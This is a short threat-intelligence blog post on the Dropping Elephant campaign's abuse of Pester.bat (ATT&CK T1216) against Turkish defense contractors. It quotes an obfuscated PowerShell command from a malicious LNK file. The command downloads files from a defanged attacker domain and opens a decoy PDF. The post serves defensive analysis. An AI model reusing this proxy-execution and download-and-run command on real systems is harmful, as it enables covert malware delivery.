Posts

Showing posts with the label dropping elephant

207. Dropping Elephant Misuses Pester to Execute Malicious PowerShell Commands

Image
Hello everyone! Let's look at how adversaries leverage the following technique - System Script Proxy Execution (T1216). But we need an example, of course. And we have it! Dropping Elephant campaign againts Turkish defense contractors described by Arctic Wolf. Once again the threat actors used malicious LNK files. And this time they abused Pester.bat to execute malicious PowerShell commands: "C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0...